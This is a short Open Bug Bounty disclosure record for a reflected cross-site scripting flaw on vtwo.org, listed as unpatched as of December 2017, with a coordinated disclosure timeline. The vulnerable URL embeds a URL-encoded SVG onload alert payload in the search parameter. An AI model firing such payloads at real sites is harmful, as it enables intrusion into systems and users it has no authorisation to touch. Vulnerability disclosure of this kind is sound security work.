vtwo.org XSS vulnerability

2017-09-22T12:28:00
ID OBB:306949
Type openbugbounty
Reporter eb
Modified 2017-12-21T14:18:00

Description

Vulnerable URL:
http://vtwo.org/search.php?q=%D9%BE%DB%8C%D8%A7%D8%AF%27%22%3E%3Csvg+onload%3D%22alert%28%27OPEN%27%22%3E%3Csvg+onload%3D%22alert%28%27OPENBUGBOUNTY%27%29%22%3EBUGBOUNTY%27%29%22%3E%D9%87+%D8%B3%D8%A7%D8%B2%DB%8C+%D8%A7%D9%84%DA%AF%D9%88%D8%B1%DB%8C%D8%AA%D9%85+Apriori+%D8%AF%D8%A7%D8%AF%D9%87+%DA%A9%D8%A7%D9%88%DB%8C+%D8%A8%D9%87+%D8%B2%D8%A8%D8%A7%D9%86+PHP&lang=fa

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 21.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1034413
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 12:28 GMT
Generic security notifications sent to website owner| 22 September, 2017 13:35 GMT
Notification sent to subscribers (without technical details)| 22 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 21 December, 2017 14:18 GMT